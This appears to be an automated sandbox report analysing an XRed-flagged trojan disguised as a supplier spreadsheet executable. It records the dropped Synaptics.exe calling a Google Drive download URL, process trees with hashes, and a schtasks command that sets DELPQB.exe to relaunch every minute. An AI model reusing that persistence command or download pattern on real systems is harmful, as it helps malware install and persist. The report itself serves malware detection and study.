                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:35 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:35 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="upDKOlLaklIYlb7g1d9X0A">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:35 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>


                                                                                                                Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                93 | 192.168.2.7 | 59969 | 142.250.181.225 | 443 | 7412 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Timestamp | Bytes transferred | Direction | Data
                                                                                                                2024-12-30 09:58:45 UTC | 388 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                User-Agent: Synaptics.exe
                                                                                                                Cache-Control: no-cache
                                                                                                                Host: drive.usercontent.google.com
                                                                                                                Connection: Keep-Alive
                                                                                                                Cookie: NID=520=fc0VH7PS-yexSfzznkRPcK6Wks08DA3I8X1m1Vw-jePCgZX8MjjMA4nVgwfjdZo9oWAFY8eJzBFrUBUpU7kyeFnq6Vq9qa4_eSjwXOyuQWVjg6Rmsj7erPSoHeWixV86YoozCpXvLCkWcJdwnqkbX7yx9-z2vNJ4uJsIxtyCThUuO8oV_2jzrfqD
                                                                                                                2024-12-30 09:58:46 UTC | 1250 | IN | HTTP/1.1 404 Not Found
                                                                                                                X-GUploader-UploadID: AFiumC4y1D45GmMjch26qEnVFScm7LQvNPewpehh6SetJHAwpnQloB_AshU85Yr4-URJXJSdbC1UrHA
                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                Pragma: no-cache
                                                                                                                Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                Date: Mon, 30 Dec 2024 09:58:46 GMT
                                                                                                                Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                Content-Security-Policy: script-src 'report-sample' 'nonce-ddDYmSGA2ufNO0-_IL6KgA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                Cross-Origin-Opener-Policy: same-origin
                                                                                                                Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                Content-Length: 1652
                                                                                                                Server: UploadServer
                                                                                                                Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                Content-Security-Policy: sandbox allow-scripts
                                                                                                                Connection: close
                                                                                                                2024-12-30 09:58:46 UTC | 140 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error
                                                                                                                2024-12-30 09:58:46 UTC | 1390 | IN | Data Ascii: 404 (Not Found)!!1</title><style nonce="YB98jm4fyeRJPCfOTaQBKg">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;
                                                                                                                2024-12-30 09:58:46 UTC | 122 | IN | Data Ascii: b> <ins>That’s an error.</ins><p>The requested URL was not found on this server. <ins>That’s all we know.</ins></main>



                                                                                                                Target ID:0
                                                                                                                Start time:04:58:00
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\Supplier 0202AW-PER2 Sheet.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:1'685'504 bytes
                                                                                                                MD5 hash:97E5BA8188B0E2613FD02EE2B8DFEE7A
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 00000000.00000000.1227091333.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Author: Joe Security
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:2
                                                                                                                Start time:04:58:01
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\Desktop\._cache_Supplier 0202AW-PER2 Sheet.exe"
                                                                                                                Imagebase:0xd70000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000002.00000002.2498031591.0000000004DCC000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 55%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:false

                                                                                                                Target ID:3
                                                                                                                Start time:04:58:01
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe" InjUpdate
                                                                                                                Imagebase:0x400000
                                                                                                                File size:771'584 bytes
                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: 00000003.00000003.1301308336.000000000069F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_XRed, Description: Yara detected XRed, Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\ProgramData\Synaptics\Synaptics.exe, Author: Joe Security
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Avira
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 92%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:4
                                                                                                                Start time:04:58:01
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" /automation -Embedding
                                                                                                                Imagebase:0xd50000
                                                                                                                File size:53'161'064 bytes
                                                                                                                MD5 hash:4A871771235598812032C822E6F68F19
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:5
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\system32\cmd.exe /c schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                Imagebase:0x410000
                                                                                                                File size:236'544 bytes
                                                                                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:6
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\System32\conhost.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                Imagebase:0x7ff75da10000
                                                                                                                File size:862'208 bytes
                                                                                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:7
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\wscript.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:WSCript C:\Users\user~1\AppData\Local\Temp\ZMNYQK.vbs
                                                                                                                Imagebase:0x150000
                                                                                                                File size:147'456 bytes
                                                                                                                MD5 hash:FF00E0480075B095948000BDC66E81F0
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Yara matches:
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2484943427.0000000002F58000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2488281315.0000000003376000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                • Rule: JoeSecurity_ProcessChecker, Description: Yara detected ProcessChecker, Source: 00000007.00000002.2484943427.0000000002F77000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                Reputation:high
                                                                                                                Has exited:false

                                                                                                                Target ID:8
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\schtasks.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:schtasks /create /tn ZMNYQK.exe /tr C:\Users\user\AppData\Roaming\Windata\DELPQB.exe /sc minute /mo 1
                                                                                                                Imagebase:0x10000
                                                                                                                File size:187'904 bytes
                                                                                                                MD5 hash:48C2FE20575769DE916F48EF0676A965
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:9
                                                                                                                Start time:04:58:03
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Antivirus matches:
                                                                                                                • Detection: 100%, Joe Sandbox ML
                                                                                                                • Detection: 55%, ReversingLabs
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:18
                                                                                                                Start time:04:58:09
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\ProgramData\Synaptics\Synaptics.exe"
                                                                                                                Imagebase:0x400000
                                                                                                                File size:771'584 bytes
                                                                                                                MD5 hash:1D45B99034D67448EBF0776BD5699C84
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:Borland Delphi
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:21
                                                                                                                Start time:04:58:17
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:22
                                                                                                                Start time:06:00:35
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:low
                                                                                                                Has exited:true

                                                                                                                Target ID:25
                                                                                                                Start time:06:00:44
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\SysWOW64\WerFault.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Windows\SysWOW64\WerFault.exe -u -p 7412 -s 7800
                                                                                                                Imagebase:0x170000
                                                                                                                File size:483'680 bytes
                                                                                                                MD5 hash:C31336C1EFC2CCB44B4326EA793040F2
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Reputation:high
                                                                                                                Has exited:true

                                                                                                                Target ID:26
                                                                                                                Start time:06:00:48
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:"C:\Users\user\AppData\Roaming\Windata\DELPQB.exe"
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:27
                                                                                                                Start time:06:01:00
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:30
                                                                                                                Start time:06:02:00
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Wow64 process (32bit):true
                                                                                                                Commandline:C:\Users\user\AppData\Roaming\Windata\DELPQB.exe
                                                                                                                Imagebase:0x8f0000
                                                                                                                File size:913'920 bytes
                                                                                                                MD5 hash:DB7FC8188230C44A2B7360862DCF26E9
                                                                                                                Has elevated privileges:false
                                                                                                                Has administrator privileges:false
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:true

                                                                                                                Target ID:32
                                                                                                                Start time:06:02:14
                                                                                                                Start date:30/12/2024
                                                                                                                Path:C:\Windows\splwow64.exe
                                                                                                                Wow64 process (32bit):false
                                                                                                                Commandline:C:\Windows\splwow64.exe 12288
                                                                                                                Imagebase:0x7ff7107c0000
                                                                                                                File size:163'840 bytes
                                                                                                                MD5 hash:77DE7761B037061C7C112FD3C5B91E73
                                                                                                                Has elevated privileges:true
                                                                                                                Has administrator privileges:true
                                                                                                                Programmed in:C, C++ or other language
                                                                                                                Has exited:false

                                                                                                                  Execution Graph

                                                                                                                  Execution Coverage:4.2%
                                                                                                                  Dynamic/Decrypted Code Coverage:0%
                                                                                                                  Signature Coverage:9.5%
                                                                                                                  Total number of Nodes:2000
                                                                                                                  Total number of Limit Nodes:39
81 API calls 104991->104992 104993 dc6fd6 SetWindowTextW 104992->104993 104993->104769 104995 d750f6 104994->104995 104996 d75105 104994->104996 104995->104769 104996->104995 104997 d7510a CloseHandle 104996->104997 104997->104995 104999 d7cdb4 48 API calls 104998->104999 105000 dc9515 104999->105000 105001 dbbe47 50 API calls 105000->105001 105002 dc9522 105001->105002 105003 dc952f send 105002->105003 105004 dc9546 105003->105004 105005 dc9552 WSAGetLastError 105004->105005 105006 dc956a 105004->105006 105005->105006 105006->104769 105008 d784a6 81 API calls 105007->105008 105009 dbeff2 105008->105009 105613 db78ad GetFullPathNameW 105009->105613 105014 dbf04b CoInitialize CoCreateInstance 105016 dbf08e 105014->105016 105017 dbf070 105014->105017 105042 d7d3d2 48 API calls 105041->105042 105043 dd354a 105042->105043 105044 d7d3d2 48 API calls 105043->105044 105045 dd3553 105044->105045 105046 d7d3d2 48 API calls 105045->105046 105047 dd355c 105046->105047 105048 d784a6 81 API calls 105047->105048 105059 dd35e9 Mailbox 105047->105059 105049 dd3580 105048->105049 105633 dd3d7b 105049->105633 105059->104769 105130 dc95e0 105129->105130 105130->104769 105131->104770 105132->104769 105133->104968 105134->104962 105135->104970 105136->104970 105138 db6d8a __NMSG_WRITE 105137->105138 105139 db6db3 GetFileAttributesW 105138->105139 105140 db6de3 105139->105140 105141 db6dc5 GetLastError 105139->105141 105140->104978 105142 db6dd0 CreateDirectoryW 105141->105142 105143 db6de7 105141->105143 105142->105140 105142->105143 105143->105140 105144 d73bcf 48 API calls 105143->105144 105145 db6df7 _wcsrchr 105144->105145 105145->105140 105146 db6d6d 48 API calls 105145->105146 105147 db6e1b 105146->105147 105147->105140 105148 db6e28 CreateDirectoryW 105147->105148 105148->105140 105150 dc2306 105149->105150 105151 dc230a 105150->105151 105152 dc2365 105150->105152 105154 d9010a 48 API calls 105151->105154 105218 d8f0f3 48 API calls 105152->105218 105155 dc2311 105154->105155 
105156 dc231f 105155->105156 105205 d75080 49 API calls 105155->105205 105158 d784a6 81 API calls 105156->105158 105161 dc2331 105158->105161 105159 dc2379 105160 dc234d 105159->105160 105163 dc243f 105159->105163 105166 dc23bb 105159->105166 105160->104981 105206 d74bf9 105161->105206 105225 dbbe47 105163->105225 105169 d784a6 81 API calls 105166->105169 105167 dc2446 105229 db689f SetFilePointerEx SetFilePointerEx WriteFile 105167->105229 105176 dc23c2 105169->105176 105171 dc23f6 105187 db67dc 105171->105187 105174 dc2400 105219 d77b6e 105174->105219 105176->105171 105176->105174 105180 dc23fe Mailbox 105180->105160 105182 d750ec CloseHandle 105180->105182 105184 dc2490 105182->105184 105230 d74592 CloseHandle 105184->105230 105188 db67ec 105187->105188 105189 db67f6 105187->105189 105247 db6917 SetFilePointerEx SetFilePointerEx WriteFile 105188->105247 105191 db6808 105189->105191 105192 db67fc 105189->105192 105194 db6811 105191->105194 105195 db6824 105191->105195 105248 db68b9 51 API calls 105192->105248 105196 d7a6d4 48 API calls 105194->105196 105231 d7a6d4 105195->105231 105204 db67f4 Mailbox 105204->105180 105205->105156 105207 d750ec CloseHandle 105206->105207 105208 d74c04 105207->105208 105287 d74b88 105208->105287 105218->105159 105220 d9010a 48 API calls 105219->105220 105221 d77b93 105220->105221 105222 d7a6f8 48 API calls 105221->105222 105223 d77ba2 105222->105223 105226 dbbe50 105225->105226 105227 dbbe55 105225->105227 105341 dbae06 50 API calls 2 library calls 105226->105341 105227->105167 105229->105180 105230->105160 105247->105204 105248->105204 105288 d74ba1 CreateFileW 105287->105288 105289 de4957 105287->105289 105291 d74bc3 105288->105291 105290 de495d CreateFileW 105289->105290 105289->105291 105290->105291 105341->105227 105343 d7cdc5 105342->105343 105344 d7cdca 105342->105344 105343->105344 105409 d92241 48 API calls 105343->105409 105344->104984 105346 d7ce07 105346->104984 105348 d7e216 105347->105348 105408 d7e226 Mailbox 
105347->105408 105349 d7e670 105348->105349 105348->105408 105478 d8ecee 417 API calls 105349->105478 105351 d7e4e7 105352 d7e4fd 105351->105352 105479 d7322e 16 API calls 105351->105479 105352->104769 105354 d7e681 105354->105352 105355 d7e68e 105354->105355 105480 d8ec33 417 API calls Mailbox 105355->105480 105356 d7e26c PeekMessageW 105356->105408 105358 de5b13 Sleep 105358->105408 105359 d7e695 LockWindowUpdate DestroyWindow GetMessageW 105359->105352 105364 d8cf79 49 API calls 105364->105408 105366 d7e657 PeekMessageW 105366->105408 105367 d9010a 48 API calls 105367->105408 105368 d7e517 timeGetTime 105368->105408 105370 d7c935 48 API calls 105370->105408 105371 de5dfc WaitForSingleObject 105374 de5e19 GetExitCodeProcess CloseHandle 105371->105374 105371->105408 105372 d7e641 TranslateMessage DispatchMessageW 105372->105366 105373 de6147 Sleep 105400 de5cce Mailbox 105373->105400 105374->105408 105375 d7d3d2 48 API calls 105375->105400 105376 d7e6cc timeGetTime 105481 d8cf79 49 API calls 105376->105481 105377 de5feb Sleep 105377->105408 105382 de61de GetExitCodeProcess 105386 de620a CloseHandle 105382->105386 105387 de61f4 WaitForSingleObject 105382->105387 105384 d71000 393 API calls 105384->105408 105386->105400 105387->105386 105387->105408 105388 de5cea Sleep 105388->105408 105390 d71dce 107 API calls 105390->105408 105391 de5cd7 Sleep 105391->105388 105392 dd8a48 108 API calls 105392->105400 105393 de6266 Sleep 105393->105408 105394 d7caee 48 API calls 105394->105400 105399 d7fa40 393 API calls 105399->105408 105400->105375 105400->105382 105400->105388 105400->105391 105400->105392 105400->105393 105400->105394 105400->105408 105483 db56dc 49 API calls Mailbox 105400->105483 105484 d8cf79 49 API calls 105400->105484 105485 d7d380 105400->105485 105489 d71000 417 API calls 105400->105489 105491 dcd12a 50 API calls 105400->105491 105492 db8355 QueryPerformanceCounter QueryPerformanceFrequency Sleep QueryPerformanceCounter Sleep 105400->105492 105493 d8e3a5 
timeGetTime 105400->105493 105494 db6f5b CreateToolhelp32Snapshot Process32FirstW 105400->105494 105402 d844e0 393 API calls 105402->105408 105403 d83680 393 API calls 105403->105408 105404 d7caee 48 API calls 105404->105408 105406 dbd520 86 API calls 105406->105408 105407 d7d380 55 API calls 105407->105408 105408->105351 105408->105356 105408->105358 105408->105364 105408->105366 105408->105367 105408->105368 105408->105370 105408->105371 105408->105372 105408->105373 105408->105376 105408->105377 105408->105384 105408->105388 105408->105390 105408->105399 105408->105400 105408->105402 105408->105403 105408->105404 105408->105406 105408->105407 105410 d7e7e0 105408->105410 105417 d7ea00 105408->105417 105467 d8f381 105408->105467 105472 d8ed1a 105408->105472 105477 d7e7b0 417 API calls Mailbox 105408->105477 105482 dd8b20 48 API calls 105408->105482 105490 d8e3a5 timeGetTime 105408->105490 105409->105346 105411 d7e7fd 105410->105411 105413 d7e80f 105410->105413 105501 d7dcd0 105411->105501 105532 dbd520 86 API calls 4 library calls 105413->105532 105416 de98e8 105416->105416 105418 d7ea20 105417->105418 105419 d7fa40 417 API calls 105418->105419 105421 d7ea89 105418->105421 105422 de9919 105419->105422 105420 de99bc 105547 dbd520 86 API calls 4 library calls 105420->105547 105426 d7d3d2 48 API calls 105421->105426 105448 d7eb18 105421->105448 105454 d7ecd7 Mailbox 105421->105454 105422->105421 105544 dbd520 86 API calls 4 library calls 105422->105544 105424 d7d3d2 48 API calls 105427 de9997 105424->105427 105428 de9963 105426->105428 105545 d91b2a 52 API calls __cinit 105428->105545 105431 d7d380 55 API calls 105431->105454 105433 de9d70 105556 dce2fb 417 API calls Mailbox 105433->105556 105434 de9e49 105561 dbd520 86 API calls 4 library calls 105434->105561 105435 dbd520 86 API calls 105435->105454 105436 de9dc2 105558 dbd520 86 API calls 4 library calls 105436->105558 105437 de9ddf 105559 dcc235 417 API calls Mailbox 105437->105559 105439 d7fa40 417 API calls 
105439->105454 105444 d7342c 48 API calls 105444->105454 105447 d814a0 48 API calls 105447->105454 105448->105424 105448->105454 105451 d7f56f 105466 d7ef0c Mailbox 105451->105466 105557 dbd520 86 API calls 4 library calls 105451->105557 105453 de9a3c 105550 dcd154 48 API calls 105453->105550 105454->105420 105454->105431 105454->105433 105454->105434 105454->105435 105454->105436 105454->105437 105454->105439 105454->105444 105454->105447 105454->105451 105454->105453 105454->105466 105540 d7d805 105454->105540 105548 dba3ee 48 API calls 105454->105548 105549 dcede9 417 API calls 105454->105549 105554 daa599 InterlockedDecrement 105454->105554 105555 dcf4df 417 API calls 105454->105555 105466->105408 105468 d8f390 105467->105468 105469 deee11 105467->105469 105468->105408 105470 deee46 105469->105470 105471 deee28 TranslateAcceleratorW 105469->105471 105471->105468 105473 d8ed2c 105472->105473 105475 d8ed34 105472->105475 105473->105408 105474 d8ed5e IsDialogMessageW 105474->105473 105474->105475 105475->105473 105475->105474 105476 deebec GetClassLongW 105475->105476 105476->105474 105476->105475 105477->105408 105478->105351 105479->105354 105480->105359 105481->105408 105482->105408 105483->105400 105484->105400 105486 d7d38b 105485->105486 105487 d7d3b4 105486->105487 105562 d7d772 55 API calls 105486->105562 105487->105400 105489->105400 105490->105408 105491->105400 105492->105400 105493->105400 105563 db79c2 105494->105563 105499 db6fa0 _wcscat 105502 d7fa40 417 API calls 105501->105502 105515 d7dd0f _memmove 105502->105515 105503 de8dbe 105506 d7dd70 105507 d7e12b Mailbox 105510 d9010a 48 API calls 105510->105515 105515->105503 105515->105506 105515->105507 105515->105510 105517 d7deb7 105515->105517 105527 d7df29 105515->105527 105517->105507 105532->105416 105541 d7d828 _memmove 105540->105541 105542 d7d815 105540->105542 105541->105454 105542->105541 105544->105421 105545->105448 105547->105466 105548->105454 105549->105454 105554->105454 105555->105454 
105556->105451 105557->105466 105558->105466 105561->105466 105562->105487 105564 db79e9 105563->105564 105565 db79d0 105563->105565 105583 d9224a 58 API calls __wcstoi64 105564->105583 105565->105564 105568 db79ef 105565->105568 105582 d922df GetStringTypeW wcstoxq 105565->105582 105568->105499 105582->105565 105583->105568 105614 d77e53 48 API calls 105613->105614 105615 db78df 105614->105615 105627 d8e617 105615->105627 105618 dc267a 105619 dc26a4 __NMSG_WRITE 105618->105619 105620 dbf039 105619->105620 105621 dc26d8 105619->105621 105624 dc2763 105619->105624 105620->105014 105625 d739e8 48 API calls 2 library calls 105620->105625 105621->105620 105631 d8dfd2 60 API calls 105621->105631 105624->105620 105632 d8dfd2 60 API calls 105624->105632 105625->105014 105628 d8e625 105627->105628 105629 d7a2fb 48 API calls 105628->105629 105630 d8e635 105629->105630 105630->105618 105631->105621 105632->105624 105634 d7c4cd 48 API calls 105633->105634 105635 dd3d89 105634->105635 105636 d7c4cd 48 API calls 105635->105636 105637 dd3d91 105636->105637 105638 d7c4cd 48 API calls 105637->105638 105690->104802 105691->104802 105692->104190 105693->104190 105694->104190 105695->104190 105696->104190 105697->104188 105698->104189 105699->104175 105700->104172 105701->104178 105702->104186 105704 d8f069 105703->105704 105705 d8f057 105703->105705 105708 d7c4cd 48 API calls 105704->105708 105706 d8f05d 105705->105706 105707 d8f063 105705->105707 105710 d7a6d4 48 API calls 105706->105710 105709 d7a6d4 48 API calls 105707->105709 105718 db64f5 105708->105718 105711 db668b 105709->105711 105713 d8f081 105710->105713 105714 d74c4f 50 API calls 105711->105714 105712 db6524 105712->104259 105738 d74c4f 105713->105738 105717 db6699 105714->105717 105725 db66a9 Mailbox 105717->105725 105765 db6765 50 API calls 105717->105765 105718->105712 105763 db649b ReadFile SetFilePointerEx 105718->105763 105764 d7bd2f 48 API calls _memmove 105718->105764 105720 de49b2 105724 d8f0a3 Mailbox 
